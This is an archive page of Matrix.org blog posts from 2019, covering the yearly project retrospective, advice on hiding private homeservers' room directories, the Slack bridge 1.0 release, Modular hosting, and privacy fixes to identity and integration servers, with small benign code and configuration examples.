General

The 2019 Matrix Holiday Update!

24.12.2019 00:00 — General Matthew Hodgson

Hi all,

Every year we do an annual wrap-up and retrospective of all the things happening in the Matrix core team - if you’re feeling particularly curious or bored you can check out the 2015, 2016, 2017 and 2018 editions for context. The idea is to look at the bigger picture trends in Matrix outside of the weekly TWIM posts to get an idea of the stuff which we made progress on, and the stuff which still remains.

That said, it’s hard to know where to start - Matrix accelerated more than ever before in 2019, and there’s been progress on pretty much all battlefronts. So as a different format, let’s take the stuff we said we had planned for 2019 from the end of last year’s update and see what we actually achieved...

🔗2019: the immediate priorities

So, our immediate priorities for 2019 were:

  • r0 spec releases across the board (aka Matrix 1.0)
  • Implementing them in Synapse

✅ Well, unless you’ve been floating in a sensory deprivation tank for the last year, hopefully you spotted that Matrix (as a protocol) finally exited beta - starting off with the announcement at FOSDEM in February of the first stable release of the Server-Server API, alongside the Synapse 0.99.x series as we began the process of migrating to the 1.0 APIs.

Specifically this meant killing off self-signed certificates, adding .well-known server discovery and implementing room version semantics so we could upgrade the underlying room version algorithm to fix the residual flaws. This culminated in June with the official release of Matrix 1.0 - now including the remaining APIs and a stable release of Synapse 1.0. The emphasis was on addressing all the main pre-1.0 design flaws rather than adding features or performance, but with 1.0 out the door at last we’ve been able to make progress there too.
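
For the curious, the .well-known delegation mechanism is simple enough to poke at by hand. Here’s a rough sketch (in Python, using the requests library; the domain is purely illustrative, and the real resolution algorithm also consults DNS SRV records) of what a federating server effectively does when working out where to send traffic for a given server name:

# Rough sketch of .well-known server delegation: fetch
# https://<server_name>/.well-known/matrix/server and, if present, use the
# returned "m.server" value as the host to actually talk federation to.
import requests

server_name = "example.org"  # illustrative
try:
    resp = requests.get(f"https://{server_name}/.well-known/matrix/server", timeout=10)
    delegated = resp.json().get("m.server", server_name)
except (requests.RequestException, ValueError):
    # No .well-known (or unparseable response): fall back to the server name
    # itself (the real algorithm would try DNS SRV records at this point).
    delegated = server_name

print(f"Federation traffic for {server_name} should be sent to {delegated}")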

  • Landing the Riot redesign

✅ The full redesign of Riot’s UI on Web/Desktop landed shortly after FOSDEM in Feb with The Big 1.0. Cosmetically we got most of the new look & feel in place, and have had very positive feedback overall - although some of the UX thinkos of the old app remain and are now coming up on the radar for fixing.

  • Finalising the Matrix.org Foundation

✅ This happened too, coincident with releasing Matrix 1.0 in June - read all about it at https://matrix.org/foundation. So far the governance and legal infrastructure the Foundation provides has helped the project significantly, and while it was a mammoth task to organise, we’re very glad it’s here! Huge thanks go out to Jon, Ross and Jutta for agreeing to join the foundation as Guardians - they have been excellent in patiently listening to the various dramas of the year and ensuring Matrix’s neutrality and that we keep an even keel.

  • Landing all the new E2E encryption UX and features

The good news on E2E encryption is that we’ve been making solid progress throughout the year - the bad news is that we are still yet to turn it on by default. Progress updates for the various pieces of the puzzle are as follows:

  • ✅ The final UX is pretty much locked down (after several iterations as we try to strike the right balance between trustworthiness and security) - here’s a sneak preview of what we’re aiming at.

  • 🏗 Cross-signing is the single biggest remaining piece of work in progress - letting users attest to the trustworthiness of their own devices, so you only ever have to trust a given user once rather than trusting all their devices individually. We gave a very early demo of an experimental implementation back at FOSDEM in Feb, inspired by some of the initial spec proposal at MSC1680 (MSC = Matrix Spec Change, our process for evolving Matrix).

    However, having played with it a bit, MSC1680 turned out to be too generic and complicated (it worked by the user signing a device with any other of their devices, building a twisted maze of which device vouched for which) - so we replaced it with MSC1756, which shifts the model to the simpler “the user has a key, which they use to sign their devices” (a loose conceptual sketch of the resulting trust model follows at the end of this list). This in turn requires more infrastructure, though - you need somewhere secure to store your signing key, which prompted MSC1946 - Secure Secret Storage & Sharing (SSSS): the ability to sync your signing key between devices by storing it (encrypted, of course) on the server.

    Meanwhile, it also became obvious that the primitives for key verification needed to be improved too: introducing verification by emoji comparison (MSC1267) and QR codes (MSC1543), and switching key verification to be performed in the context of a DM (MSC2241) so that you can see your verification history, find verifications, and easily dip in and out of verifying users as needed.

    Whilst everyone else was panicking about Matrix 1.0 and associated baggage, Uhoreg was off in the wilderness plugging his way through all of this - iterating on the design, speccing it and implementing it in Synapse and matrix-js-sdk, complete with a test jig to demonstrate it all working (part 1 and part 2). Over the last few months the rest of the team has joined him though, and we’ve been frantically working away implementing it all across Riot/Web, Riot/iOS & RiotX/Android. For instance - here’s verification happening in DM between Riot/Web & RiotX a few weeks ago, and here’s a very early (unskinned) cut of verification happening in Riot/Web’s RightPanel a few days ago.

    We were hoping to get cross-signing ready for the end of 2019, but in practice we’re now sprinting to get it done by FOSDEM 2020 in Feb - not least because we have a main-stage talk proposed to tell everyone how we landed it and turned on E2E by default... ;)

  • ✅ Support for non-E2E clients. The last thing we want is to make it impossible to write a simple Matrix client, or to suddenly excommunicate (hah) all the existing Matrix bots & bridges which haven’t implemented E2E. To this end, poljar created pantalaimon - our very own Matrix daemon, which can sit in the background and offload all your E2EE from your Matrix client by acting as a transparent Matrix proxy which magically encrypts everything. Built on matrix-nio and Python 3’s asyncio, we use it in production today for running various bots and it works excellently (there’s a short usage sketch at the end of this section).

  • ✅ Support for search in E2E rooms. Hot off the heels of pantalaimon’s success, poljar also created seshat - a native library for clientside indexing encrypted Matrix events written in Rust, powered by the tantivy full-text search engine. (pantalaimon also has support for indexing via tantivy, which involved contributing Python bindings for tantivy, but we ended up going with Rust so we could embed it natively in as many Matrix clients as possible). Seshat is particularly cool in that the indexes themselves are encrypted on disk - and in future could even be synced between clients using SSSS so you don’t have to reindex your messages every time you log in on a new device. Seshat is implemented behind a labs flag on Riot/Desktop and it will ship as soon as Riot/Desktop’s build pipeline is fully updated to support native modules (which will also unlock other goodies, such as using faster/safer native E2E primitives, safer key storage, and Discord-style keyboard-shortcuts for VoIP).

  • 🏗 Fixing “unable to decrypt” errors. We’ve done a big sprint over the last month or so to track down the final straggling causes of unable-to-decrypt errors. Some of these are legitimate bugs (e.g. https://github.com/matrix-org/synapse/issues/6399) - but many are artefacts of the current architecture: for instance, if the sender has no way to know your device was in the room when it encrypted a message, you won’t be able to decrypt. We’re addressing this by improving error messages and feedback so the user isn’t surprised by what’s going on (aiming for Jan) - and in future we’ll have to revisit E2E’s fundamentals to ensure that it’s impossible to receive a message without also receiving the key to decrypt it.

  • ✅ Support for push notifications in E2E rooms. This is kinda solved right now by having all clients get (silently) pushed whenever they receive a message in an E2E room with push enabled, and relying on the client to be woken up by the push in order to decrypt the message in order to display the push notification. However, this is battery intensive, and we could probably do better - but this isn’t a blocker for going live.

  • 🏗 Support for FilePanel and NotifPanel in E2E rooms. Seshat should fix this by indexing all your messages (and so tracking whether they contain pushes or files, and populating your local view of your file & notif panels respectively) - we just need to ensure it’s hooked up.
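
To make the cross-signing model above a little more concrete, here’s the loose conceptual sketch promised earlier - this is emphatically not the real matrix-js-sdk or Synapse code (the helper names are invented for illustration), but it captures the point that trusting a user boils down to checking one signing key rather than every device:

# Illustrative only: in the MSC1756 model each user publishes a self-signing key
# (which signs their own devices) and a user-signing key (which signs the master
# keys of users they have verified). Checking a device is then a short chain walk.
def signed_by(obj: dict, key_id: str) -> bool:
    """Pretend signature check: real code verifies the actual ed25519 signature."""
    return key_id in obj.get("signatures", {})

def device_is_trusted(my_user_signing_key_id: str,
                      their_master_key_id: str, their_master_key: dict,
                      their_self_signing_key_id: str, their_self_signing_key: dict,
                      their_device: dict) -> bool:
    return (
        signed_by(their_master_key, my_user_signing_key_id)         # I verified this user once...
        and signed_by(their_self_signing_key, their_master_key_id)  # ...their master key vouches for their self-signing key...
        and signed_by(their_device, their_self_signing_key_id)      # ...which in turn vouches for each of their devices.
    )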

...and that’s where things stand right now on E2E by default. We’ll start turning it on by default for private rooms as soon as the UX has landed (probably starting first with new DMs and private rooms, prompting the user in case they want to opt out - and then migrating existing ones). It’s worth noting that we have poured a lot of work into E2E encryption now - often to the detriment of the rest of Matrix; our rich featureset and decentralisation have combined to make this a tough nut to crack, but the end is in sight. Thanks to all for your patience and support while we’ve been working through this.
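
And for a taste of the pantalaimon approach mentioned above, here’s roughly what a simple non-E2E-aware bot looks like when pointed at a local pantalaimon proxy instead of directly at the homeserver. This is a sketch using matrix-nio: the port, user ID, password and room ID are placeholders, and it assumes pantalaimon is already running and configured to proxy to your homeserver.

# Minimal sketch: the bot speaks the plain (unencrypted) client-server API to
# pantalaimon on localhost, and pantalaimon transparently encrypts/decrypts
# against the real homeserver. All credentials and IDs below are placeholders.
import asyncio
from nio import AsyncClient

async def main():
    client = AsyncClient("http://localhost:8009", "@examplebot:example.org")
    await client.login("correct-horse-battery-staple")
    await client.room_send(
        room_id="!someEncryptedRoom:example.org",
        message_type="m.room.message",
        content={"msgtype": "m.text", "body": "hello from a non-E2E-aware bot"},
    )
    await client.close()

asyncio.run(main())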

That takes us to the end of the stuff we planned to prioritise in 2019 - but what about the more speculative medium-term stuff which was on the menu this time last year?

🔗2019: the medium-term priorities

  • Reworking and improving Communities/Groups.

We have some really promising UX work and a fairly early spec proposal (MSC1772), but work in earnest hasn’t kicked off yet. It’s going to be one of the next big projects though.

  • Reactions.

✅ Riot now has Reactions! 🎉🎉🎉 All that’s left is to iron out the remaining rough edges of the spec proposal (MSC1849) and actually land it in the Matrix spec proper.

  • E2E-encrypted Search

Seshat exists! (see above)

  • Filtering. (empowering users to filter out rooms & content they're not interested in).

✅ We’ve ended up thinking lots in 2019 about empowering users to filter content. The main impetus has been to ensure that users and communities can filter out abuse (on their own terms), and also to start building infrastructure which can be used for folks to share their own filters. Over the last few months, this has started to take concrete form - with the arrival of MSC2313 “Moderation policies as rooms”, and Mjolnir - a bot you can run to enforce moderation policies on your rooms. It’s all quite early, but we expect a lot more work in this space over the coming year (and it’s wryly amusing that Twitter has also woken up to it being an interesting problem needing to be solved.)
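
To give a flavour of the model, here’s a rough sketch of the kind of moderation-policy state event MSC2313 describes, which a bot like Mjolnir publishes into a policy room and then enforces. The field names and values here are from the proposal as best we recall it - treat the exact shape as an assumption and consult MSC2313 for the authoritative version:

# Hypothetical example of a ban recommendation expressed as a state event in a
# policy room; bots/servers subscribed to the policy room can then act on it.
user_ban_rule = {
    "type": "m.policy.rule.user",          # matching rule types exist for rooms and servers
    "state_key": "rule:@spammer:example.org",
    "content": {
        "entity": "@spammer:example.org",  # who/what the rule applies to
        "recommendation": "m.ban",         # the suggested action
        "reason": "spam",
    },
}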

  • Extensible events

Sorry folks; no progress here since a flurry of spec work (MSC1767) back in Jan 2019. The good news is that the spec proposal seems to be relatively well received. The bad news is that we haven’t had bandwidth to finish reviewing it, implementing it and landing it anywhere. It blocks a bunch of really useful stuff in Matrix, and there are users willing to pay for it (via New Vector) - we’ll get to it as soon as we can.

  • Editable messages.

✅ These landed too and are a thing of joy! Just need to merge MSC1849.

  • Extensible Profiles (we've actually been experimenting with this already).

Similar to Extensible Events, there was a flurry of spec work (MSC1769) back in Jan, but little progress since. This will also unlock a lot of really useful features - e.g. custom status, custom profile data, social timeline rooms etc. We’ll likely get to it shortly after communities work.

  • Threading.

🏗 So we actually landed label-based threading (MSC2326) in Synapse 1.6, but it’s not exposed in Riot yet (or elsewhere). It doesn’t have quite the same semantics as Slack-style threading; the idea is to filter down your room based on which messages are tagged as part of a given topic. However, it’s very powerful, and it’ll be fun to add it to Riot at some point in 2020. Meanwhile, better-than-label-based-threading is also on the cards, although slightly lower priority than some of the other stuff in this section.

  • Landing the Riot/Android rewrite

🏗 As you probably know, RiotX is a full rewrite of Riot/Android in Kotlin using modern AndroidX and Jetpack idioms - and it entered beta back in June. Since then we’ve been frantically working away both playing catch-up with the old app and implementing all the new stuff (reactions, edits, new E2E verification, cross-signing etc) which it makes no sense to waste time adding to Riot/Android, but which also pushes out the timeline on RiotX itself.

We’re currently sprinting to try to get RiotX ready for FOSDEM in February - hopefully users will have felt the app starting to really stabilise over the last few months (it even supports breadcrumbs now!)

  • Considering whether to do a similar overhaul of Riot/iOS

🏗 It’s cheating a bit, but Manu (the lead developer on Riot/iOS and delivery manager of Riot/Mobile in general) has been hacking on an entirely new client called Messagerie in his spare time, using SwiftUI. The idea of throwing away the whole UI layer and replacing it with the latest best practices sounds suspiciously like RiotX - it’ll be interesting to see how RiotX/iOS takes shape next year!

  • Scaling synapse via sharding the master process

We ended up bottlenecked on IO rather than CPU in 2019, and as a result we worked on splitting Synapse’s database across multiple database instances on a per-table granularity. However, the master process itself doesn’t shard yet; so we’re now bottlenecked on CPU and need to get on and do this asap to unlock further Synapse scalability for mega-monolithic-deployments like the Matrix.org homeserver.

  • Bridge UI for discovery of users/rooms and bridge status

🏗 There’s been a bit of movement in the last few weeks on this, but nothing concrete yet.

  • Bandwidth-efficient transports

✅ We finished the 100bps CoAP transport proof-of-concept for Matrix, demoed it at FOSDEM and shipped it in March. However, we haven’t progressed it much further; it really needs a corporate sponsor who wants to fund work to finish it off and bake it properly into Matrix. If you’re interested, please get in touch.

  • Bandwidth-efficient routing

🏗 We also did a bunch of related work on bandwidth-efficient routing, which sadly hasn’t been released yet. However, it’s interesting to note that the Decentralized Systems and Network Services Research Group at Karlsruhe Institute of Technology’s Institute of Telematics has been looking into this space too - c.f. their A Glimpse of the Matrix paper, which ponders very similar problems.

  • Getting Dendrite to production.

🏗 Dendrite work has been bubbling away in the background thanks to Anoa, Brendan, cnly (our GSoC dendrite contributor) and others. Inevitably most of our bandwidth has gone into getting Synapse to 1.0 and making sure it’s fit for purpose, but we want and need to keep Dendrite alive for next-generation purposes - and in fact New Vector is hiring new people to work on it in 2020.

  • Inline widgets (polls etc)

🏗 We have an MSC (MSC2192), but not an implementation.

  • Improving VoIP over Matrix.

Very little progress here, frustratingly. Jitsi has been upgraded and conference calls should kick ass these days (let us know if they don’t), but 1:1 needs a lot of love. Hopefully we’ll get to it in 2020.

  • Adding more bridges, and improving the current ones.

Lots of bridging progress in 2019 - all-new puppeting Slack support; huge fixes to the IRC bridge (including shifting to Postgres at last); Bifrost (the XMPP bridge) progressed too, and there’s been loads of community bridging work around WhatsApp, Discord and others.

  • Account portability
  • Replacing MXIDs with public keys

We’ve just started looking at implementing these seriously via MSC1228 (as of last week) - expect progress in 2020.

So that sums up progress on the medium term menu - as you can see, a bunch actually happened; a bunch made progress; a few didn’t happen at all.

🔗2019: the longer-term priorities

Finally, on the longer term radar:

  • Shared-code cross-platform client SDKs (e.g. sharing a native core library between matrix-{js,ios,android}-sdk)

No progress here. Instead, all three main platforms have continued to write and maintain their own platform-specific SDKs for now. Seshat however will be the first piece of native rust code shared across all 3 platforms - let’s see how that goes first...

  • Matrix daemons (e.g. running an always-on client as a background process in your OS which apps can connect to via a lightweight CS API)

Pantalaimon lives!

  • Push notifications via Matrix (using a daemon-style architecture)

No progress here, unless you count the CoAP low-bandwidth work. However, Bubu (also the Riot/Android F-Droid maintainer) has been working on a project called OpenPush which looks to help in this space (albeit not built on Matrix, but it could be used by Matrix). There are a few other related projects. If someone wants to build this on top of Matrix + CoAP please get in touch asap!

  • Clientside homeservers (i.e. p2p matrix) - e.g. compiling Dendrite to WASM and running it in a service worker.

🏗 Work is actually happening on this currently. Dendrite has successfully compiled to WASM and runs, and we’ve had it (almost) talking HTTP tunnelled over libp2p as part of P2P Matrix experiments. In 2020 we’re going to be investing a lot in P2P Matrix - to give users full control of their communication without even having to run a server, and also to simplify onboarding and account portability enormously. We have a talk about this accepted for FOSDEM 2020 (The Path to P2P Matrix) and we’re actively (frantically) hacking on Dendrite to make it happen - keep an eye out for how things develop!

  • Experimenting with MLS for E2E Encryption

🏗 Now that E2E-by-default has entered the “it works! let’s land it in Riot asap” phase, Uhoreg has had some time to start thinking about the longer term future of encryption in Matrix. MLS (Messaging Layer Security) is the IETF’s initiative to define a standard mechanism for end-to-end-encrypted group chats, which has some major algorithmic improvements over Olm/Megolm and the Double Ratchet Algorithm as used by Signal. The catch is that it doesn’t work at all well with decentralisation - however, we’ve been working with the MLS folks to try to ensure MLS can work in a decentralised world. More recently, Uhoreg has had a chance to think a lot more about this and we’re working on a proposal for Decentralised MLS which builds on plain MLS while also giving the semantics needed for Matrix. It’s all very experimental at this point (and the proof-of-concept implementation is written in Julia!) - but looks promising. We’ll share more asap, and will certainly be investing more time in this in 2020.

  • Storing and querying more generic data structures in Matrix (e.g. object trees; scene graphs)

Sadly no progress here :(

  • Alternate use cases for VR, IoT, etc.

...and none here either.

So, of all the myriad things on our radar for 2019 (as of Dec 2018), hopefully this gives some idea of where we hit the mark.

🔗2019: the unpredictable bits

However, there’s also a tonne of other stuff which happened which wasn’t explicitly on the radar. On the synapse side, we finished fully migrating from Python 2 to Python 3, and started using asyncio and all the latest Python 3 goodies! We finally implemented configurable history retention for servers and rooms! We even implemented self-destructing messages in Synapse (not that Riot exposes them yet). And there has been loads of optimisation and performance work since 1.0 landed in June.

On the ops side, we overhauled all our ops processes and security after the Matrix.org datacenter breach in April, throwing away our legacy infrastructure and rebuilding it properly - and subsequently have been expanding our ops team from one dedicated ops person to four. We also found ourselves having to do another emergency datacenter migration back in November when the old one was unable to reliably service IO for our database cluster.

We also spent a bunch of time after shipping Matrix 1.0 working on tightening up Matrix’s privacy model - particularly around third party identity servers, integration managers, and making sure that folks self-hosting Matrix don’t accidentally depend on 3rd party services without realising it. If you missed out on the fun at the time, you can read all about it here and here. This ended up being way more work than we expected, but we’re very glad to have sorted it out now.

Meanwhile, mainstream uptake of Matrix has properly taken off, with the French Government launching Tchap (their fork of Riot), now with hundreds of thousands of daily active users. The German Government revealed today that they are also formally trialling Matrix, starting with the Bundeswehr (the German armed forces); we’ve been helping them out with the deployment too. It is not an exaggeration to suggest that we could end up with an official cross-government Matrix network, publicly federated with the wider Internet, for self-hosted encrypted decentralised instant messaging. In fact Ulrich Kelber, the Bundesdatenschutzbeauftragter (Federal Data Protection Commissioner) for Germany pointed out: “You could even set up a privacy-friendly messenger service in cooperation with France, which in the medium term could represent a real alternative to existing products on the market as a pan-European solution”.

Alongside all this, Mozilla announced they are replacing the Moznet IRC network with Matrix; KDE joined Matrix in Feb, Wikimedia is getting set up on their server, and more and more massive players (including the largest in the world) keep getting in touch to find out how they can best get onboard Matrix - it’s incredibly exciting. It also means that we were able to raise capital to keep folks employed to work on Matrix fulltime via New Vector and scale up Modular.im as a paid hosting platform - which massively helps support core Matrix development.

🔗2020

All that remains now is to make some predictions for 2020. Our main priorities are:

  • Get E2E enabled for private rooms by default (see above).

  • Riot First-time User Experience (FTUE). While we redesigned Riot’s UI in 2019, there are still far too many weird gotchas which trip over new users. Starting in October we began a shift to completely change how Riot development works - transitioning the project to being led by the UX design team rather than the dev team, and ensuring that the design team considers the app holistically across all 3 platforms. Above all else, our priority is to make it kick ass for normal non-technical mainstream users - not just for opensourcey wizards. This is a tough ask, but we believe it’s literally make-or-break for the project in the long term if Matrix is ever to become as prevalent as Slack or WhatsApp, and we are throwing everything we have at it. The second that E2E is on by default, the entirety of the Riot teams will be focusing on the mission to clear our FTUE backlog.

  • RiotX. We’re shipping RiotX on Android as fast as we can - currently users on Riot/Android are left high and dry and we need to do everything we can to finish RiotX and get them upgraded as rapidly as possible.

  • Communities. Off the back of FTUE comes the importance of grouping rooms & users together into communities in a much better way than we have today. This will be up next.

  • Synapse: shard the master process by user/room to avoid it being bottlenecked on CPU. We also need to apply smarter queue management on federation traffic to reduce the memory footprint (and so eliminate the room-complexity limits on small-footprint hosted servers!) - and we also desperately need to speed up joins.

  • Dendrite & P2P Matrix: the plan currently is to use Dendrite as the basis for our P2P Matrix experiments. In practice this means making it federate using MSC1228-semantics (no point in wasting time implementing the ‘legacy’ key management), and then experiment with hooking it up to various P2P transports (e.g. our low-bandwidth CoAP transport) and discovery systems (e.g. mDNS; libp2p; etc). How we go about actually getting it into production depends entirely on how well the experiment goes; we could evolve Matrix to be hybrid CS/P2P; we could treat it as a new protocol and bridge to it; who knows. Watch this space...

  • MLS: figure out our plan for next-generation E2E encryption - better scaling, better reliability, and what (if anything) we should do with MLS.

  • Bridges: loads of work on the horizon to put a better UX on Bridging. Bridge stability has improved enormously over the last year (thanks Half-Shot!) but we need to transition from being robust but ugly to being robust and polished...

  • Spec: we need to work out how to go faster on reviewing MSCs (both our own and those from the wider community). While the governance process in general feels healthier than it’s ever been, empirically we’re not exactly burning through the MSC backlog - and this is in part because MSC work is squeezed in alongside everyone’s other day-job work. Finding the right balance between sculpting spec and sculpting code is tough, but we’re going to try to improve it in 2020.

  • Abuse / Reputation: we want to empower users to make their own minds up about what content they want to see and not see on Matrix (or what they want to host or not host on their servers / communities / rooms). Mjolnir is a good start, but we’ll be continuing to work on this throughout the year.

Meanwhile, all the things listed above that we didn’t get to in 2019 are of course still options on the menu too.

So there you have it. I’ve not even tried to talk about the amazing stuff that the wider Matrix community has been up to - whether that’s amazing new clients like Ditto (React Native!) or Nio! (SwiftUI), or new bridges like mautrix-facebook and mautrix-hangouts, or even poljar’s secret rewrite of weechat-matrix in Rust; your best bet there is to skim through TWIM. Huge undying thanks go out though to everyone who builds on Matrix and keeps the ecosystem maturing and growing (especially while we’re scurrying around shoring up the foundations) - there’s simply no point in Matrix as a protocol without the vibrant community building on top.

All told, it’s been a bit of an epic year (both in terms of wins and fails), and all that remains is to thank everyone who continues to use Matrix (particularly our Patreon supporters) for their ongoing support and for helping the project accelerate forwards. More than ever before, the world needs communication which is free and open to all; the age of proprietary communication silos may be coming to an end - consigned to live alongside AOL CDs and Compuserve IDs in the history books. With your support, Matrix can provide a decent mainstream yet decentralised alternative - and we’ll do everything we can to make that happen in 2020.

Happy holidays!

Matthew, Amandine & the whole Matrix.org team.

Avoiding unwelcome visitors on private Matrix servers

09.11.2019 00:00 — Privacy Matthew Hodgson

Hi all,

Over the course of today we've been made aware of folks port-scanning the general internet to discover private Matrix servers, looking for publicly visible room directories, and then trying to join rooms listed in them.

If you are running a Matrix server that is intended to be private, you must correctly configure your server to not expose its public room list to the general public - and also ensure that any sensitive rooms are invite-only (especially if the server is federated with the public Matrix network).

In Synapse, this means ensuring that the following options are set correctly in your homeserver.yaml:

# If set to 'false', requires authentication to access the server's public rooms
# directory through the client API. Defaults to 'true'.
#
allow_public_rooms_without_auth: false

# If set to 'false', forbids any other homeserver to fetch the server's public
# rooms directory via federation. Defaults to 'true'.
#
allow_public_rooms_over_federation: false

For private servers, you will almost certainly want to explicitly set these to false, meaning that the server's "public" room directory is hidden from the general internet and wider Matrix network.

You can test whether your room directory is visible to arbitrary Matrix clients on the general internet by viewing a URL like https://sandbox.modular.im/_matrix/client/r0/publicRooms (but for your server). If it gives a "Missing access token" error, you are okay.
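
If you'd rather script the check, something along these lines (Python with the requests library; substitute your own server's client API base URL) does the same thing:

# Quick check: is the room directory readable without an access token?
import requests

server = "https://example.org"  # your homeserver's client API base URL
resp = requests.get(f"{server}/_matrix/client/r0/publicRooms", timeout=10)

if resp.status_code == 401:
    print("Good: the public rooms directory requires authentication.")
else:
    rooms = resp.json().get("chunk", [])
    print(f"Warning: the directory is world-readable ({len(rooms)} rooms visible).")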

You can test whether your room directory is visible to arbitrary Matrix servers on the general internet by loading Riot (or similar) on another server, and entering the target server's domain name into the room directory's server selection box. If you can't see any rooms, then you are okay.

Relatedly, please ensure that any sensitive rooms are set to be "invite only" and room history is not world visible - particularly if your server is federated, or if it has public registration enabled. This stops random members of the public peeking into them (let alone joining them).

Relying on security-by-obscurity is a very bad idea: all it takes is for someone to scan the whole internet for Matrix servers and then try to join (say) #finance on each discovered domain (either by signing up on that server or by joining over federation) to cause problems.

Finally, if you don't want the general public reading your room directory, please also remember to turn off public registration on your homeserver. Otherwise even with the changes above, if randoms can sign up on your server to view & join rooms then all bets are off.

We'll be rethinking the security model of room directories in future (e.g. whether to default them to being only visible to registered users on the local server, or whether to replace per-server directories with per-community directories with finer grained access control, etc) - but until this is sorted, please heed this advice.

If you have concerns about randoms having managed to discover or join rooms which should have been private, please contact [email protected].

matrix-appservice-slack bridge 1.0 is here!

03.10.2019 00:00 — General Half-Shot

Hello Matrix enthusiasts! Yesterday we released matrix-appservice-slack 1.0. This marks a major milestone in bridge development for the Matrix.org team, being our first bridge ever to reach 1.0. We decided to cut this release once the bridge had gained enough features and reached a point of stability where it could be deployed in the wild with minimal risk.

For those not in the know, the Slack bridge is Node.js based, and bridges Slack channels & users into Matrix seamlessly. And for those wondering: yes, it works with Mattermost too (since its API is compatible with Slack’s)! Previous versions supported only a limited subset of features, making heavy use of Slack’s webhook API. As of 1.0, the bridge makes use of the newer Slack Events/RTM API, which gives us all we need for a richer bridging experience. Everything from edits and reactions to typing notifications is supported in the 1.0 release.

Finally, for those who are self-hosting, we are pleased to offer the ability to "puppet" your Slack account using the bridge. Puppeting means that when you talk using your Matrix account, the bridge sends messages as if you were sending them from the Slack client directly. This opens the door to seamless bridging and direct messaging support.

For those wishing to bridge their whole workspace across, picard exists as a tool to manage large scale Slack bridge deployments. This tool is provided by Cadair and SolarDrew.

[Screenshot: threading & reactions working across the Slack bridge]

The bridge has undergone some pretty serious code surgery as well. The whole codebase has been rewritten in TypeScript to take advantage of type checking and generic types. The bridge is currently based upon the matrix-appservice-bridge library. The datastore interface now supports PostgreSQL, which allows administrators to inspect and edit the database while the bridge is running, as well as offering a helpful performance boost over the NeDB datastore format that was used previously. Finally, the codebase has proper unit and integration tests to ensure new changes will not cause any regressions in behaviour. In short, now is an excellent time to get involved and hack on the bridge. There is already a crafted list of easy issues for new and experienced bridge devs.

[Grafana graph: memory usage of the bridge, before/after comparison]

[Grafana graph: CPU usage of the bridge, before/after comparison]

To give a sense of how much traffic the bridge on matrix.org is currently serving, here are some figures:

  • 2562 bridged rooms
  • 764 teams connected to the bridge
  • 103711 events have passed through the bridge since the launch of 0.3.2

Of course, our work doesn’t stop at 1.0. The plan for the immediate future of the bridge is to continue adding support for other event types coming from Matrix and Slack to create an ever richer experience. Obvious features are things like topic changes, and syncing membership across the bridge. In the long term future we would also like to add community support to the bridge, so whole Slack workspaces can be bridged across with a single click.

That’s all from me, and I would like to say a massive thank you to Cadair and Ben for both their code and review work on the project and as always, thank you to the community for using the bridge and reporting issues. 🙂


5-user Matrix homeserver hosting now available from Modular

17.07.2019 00:00 — General Modular.im

Hi all,

If you’ve been looking for a way to have your own Matrix homeserver without having to run it yourself, you may be interested to hear that Modular (the Matrix hosting provider run by New Vector, the startup which employs many of the Matrix core team) is now offering a personal-sized homeserver hosting service, with servers starting at just 5 users.

A lot of recent performance work on Synapse has been driven by the need to make smaller dedicated servers more efficient to run - so if you run your own homeserver you’ll benefit from all this work too :) Meanwhile, if you choose to outsource your server hosting to Modular, you’ll be indirectly supporting core Matrix and Synapse development, given most of the core Matrix team work for New Vector - it’s buying services like this which lets us keep folks able to hack on Matrix as their day job.

See more details over at the Modular blog post!

Tightening up privacy in Matrix

30.06.2019 00:00 — General Matthew Hodgson

Hi all,

A few weeks ago there was some discussion around the privacy of typical Matrix configurations, particularly how Riot's default config uses vector.im as an Identity Server (for discovering users on Matrix by their email address or phone number) and scalar.vector.im as an Integration Manager (i.e. the mechanism for adding hosted bots/bridges/widgets into rooms). This means that Riot, even if using a custom homeserver and running from a custom Riot deployment, will try to talk to *.vector.im (run by New Vector; the company formed by the core Matrix team in 2017) for some operations unless an alternative IS or IM has been specified in the config.

We haven't done as good a job at explaining this as we could have, and this blog post is a progress update on how we're fixing that and improving other privacy considerations in general.

Firstly, the reason Riot is configured like this is for the user's convenience: in general, we believe most users just want to discover other people on Matrix as easily as possible, and a logically-centralised server for looking up user matrix IDs by email/phone number (called third party IDs, or 3PIDs) is the only comprehensive way of doing so. Decentralising this data while protecting the privacy of the 3PIDs and their matrix IDs is a Hard Problem which we're unaware of anyone having solved yet. Alternatively, you could run a local identity server, but it will end up having to delegate to a centralised identity server anyway for IDs it has no other way to know about. Similarly, providing a default integration server that just works out of the box (rather than mandating the user configures their own) is a matter of trying to keep Riot's UX simple, especially when onboarding users, and especially given Riot's reputation for complexity at the best of times.

That said, the discussion highlighted some areas for improvement. Specifically:

  1. When doing work on making Matrix GDPR compliant back in May 2018, we set up a single privacy policy for the services we run, and got users to agree to it by locking them out of the matrix.org homeserver until they did. However, we missed that users not on the matrix.org homeserver might still be using our Identity Service (IS) & Integration Manager (IM) without accepting the privacy policy. Over the last few weeks we've been working on addressing this - it turns out that it's a pain to fix, given the Identity Service doesn't have the concept of users, so tracking which users have agreed to the privacy policy or not means some fairly major changes. The current proposal is to change the Identity Service to use a form of OpenID to authenticate users against their homeserver in order to check they've accepted the IS's terms of use - see MSC2140 for the gory details.

Meanwhile, Riot is being updated to prompt the user to accept the IS & IM terms of use (if different to the HS's), and thus make it crystal clear to the user that they are using an IS & IM and that they have the option not to if desired - see https://github.com/vector-im/riot-web/issues/10167 and associated issues. This includes also explicitly prompting the user as to whether they want 3PIDs they provide at registration to be discoverable, as per https://github.com/vector-im/riot-web/issues/10091.

  2. Riot on iOS & Android gives the option of scanning your local addressbook to discover which of your contacts are on Matrix. The wording explaining this wasn't clear enough on Android - which we promptly fixed. Separately, the contact details sent to the server are currently not obfuscated. This is partially because we hadn't got to it, and partially because obfuscating them doesn't actually help much with privacy, given an attacker can just scan through possible obfuscated phone numbers and email addresses to deobfuscate them. However, we've been working through obfuscating the contact details anyway by hashing as per MSC2134, which has all the details (there's a short sketch of the hashing idea at the end of this list). We're also adding an explicit lookup warning in Riot/Web, as per https://github.com/vector-im/riot-web/issues/10093.

  3. There was a bug where Riot/Web was querying the Integration Manager every time you opened a room, even if that room had no integrations (actually, it did it 3 times in a row). This got fixed and released in Riot/Web 1.2.2 back on June 19th.

